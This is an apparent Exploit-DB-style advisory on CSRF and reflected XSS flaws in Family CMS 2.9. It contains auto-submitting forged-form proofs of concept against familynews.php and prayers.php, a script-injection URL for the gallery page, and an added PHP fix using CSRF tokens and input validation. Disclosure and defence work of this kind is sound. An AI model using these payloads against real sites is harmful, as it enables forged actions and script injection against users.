Vendor: Family CMS
By: Ahmed Elhady Mohamed
CVSS: 3,3 (MEDIUM)
Vulnerability: CSRF and XSS
CWE: 352, 79
Product Name: Family CMS
Affected Version From: 2.9
Affected Version To: 2.9
Patch Exists: NO
Related CWE: N/A
CPE: 2.9
Platforms Tested: Ubuntu 11.4
2020

Family CMS 2.9 and earlier multiple Vulnerabilities

Family CMS 2.9 and earlier is vulnerable to CSRF and reflected XSS. Proofs of concept for both are provided in the text below.

Mitigation:

Implement CSRF tokens and validate user input to prevent XSS attacks.

Exploit-DB raw data:

Family CMS 2.9  and earlier multiple Vulnerabilities
===================================================================================
# Exploit Title: Family CMS 2.9  and earlier multiple Vulnerabilities
# Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.9/FCMS_2.9.zip/download
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# version: 2.9
# Category: webapps
# Tested on: ubuntu 11.4  
===================================================================================
 
 
 Tips:
	*****First we must install all optional sections during installation process.*****       
	      
1- CSRF Vulnerabilities :

	POC 1: Page "familynews.php"
	     
	   
		<html>
		    <head>
		        <script type="text/javascript">
		            function autosubmit() {
		                document.getElementById('ChangeSubmit').submit();
		            }  
		        </script>
		    </head>
		    <body  onLoad="autosubmit()">
		        <form method="POST"  action="http://[localhost]/FCMS_2.9/familynews.php"  id="ChangeSubmit">
		            <input type="hidden"  name="title"  value="test" />
		            <input type="hidden"  name="submitadd"  value="Add" />
		            <input type="hidden"  name="post"  value="testcsrf" />
		            <input type="submit" value="submit"/>
		        </form>
		    </body>
		</html>
	 
	 --------------------------------------------------------------------------------------------------------
	    
	 POC 2:Page "prayers.php"
	    

	      <html>
		<head>
		    <script type="text/javascript">
		        function autosubmit() {
		            document.getElementById('ChangeSubmit').submit();
		        }  
		    </script>
		</head>
		<body  onLoad="autosubmit()">
		    <form method="POST"  action="http://[localhost]/FCMS_2.9/prayers.php" id="ChangeSubmit">
		        <input type="hidden"  name="for"  value="test" />
		        <input type="hidden"  name="submitadd"  value="Add" />
		        <input type="hidden"  name="desc"  value="testtest" />
		        <input type="submit" value="submit"/>
		    </form>
		 
		</body>
	    </html>
----------------------------------------------------------------------------------------------------------------------------
2-Reflected XSS
	
	POC :   http://[localhost]/fcms_2.9/gallery/index.php?uid=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

-----------------------------------------------------------------------------------------------------------------------------
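
The mitigation named in the summary, as an added PHP example that is not part of the original advisory or of Family CMS: a per-session CSRF token for the POST forms shown in the PoCs, plus validation and output encoding for the `uid` parameter. The helper names, the `csrf_token` field name and the assumption that `uid` is a numeric user id are illustrative, not taken from the application.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical helpers, not code from Family CMS itself.
session_start();

// Return the per-session CSRF token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to place inside every state-changing form
// (for example the "submitadd" forms on familynews.php and prayers.php).
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="' . csrf_token() . '" />';
}

// Constant-time comparison of the submitted token with the session token.
function csrf_is_valid(array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent) && $sent !== '' && hash_equals(csrf_token(), $sent);
}

// Encode a value before writing it into HTML text or a quoted attribute.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Assumption: "uid" is a numeric user id; anything else is rejected.
function clean_uid($raw): ?int
{
    return (is_string($raw) && ctype_digit($raw) && strlen($raw) <= 9) ? (int) $raw : null;
}

// Reject forged cross-site POSTs before the "Add" action is processed.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_POST['submitadd'])) {
    if (!csrf_is_valid($_POST)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}
$uid = clean_uid($_GET['uid'] ?? null);
echo $uid === null ? 'Invalid uid' : 'Gallery for user ' . h((string) $uid);
```

With the token check in place, the auto-submitting forms from the two CSRF PoCs receive a 403 because a third-party page cannot read the session's token, and the `uid` payload from the XSS PoC is rejected as non-numeric instead of being echoed into the page.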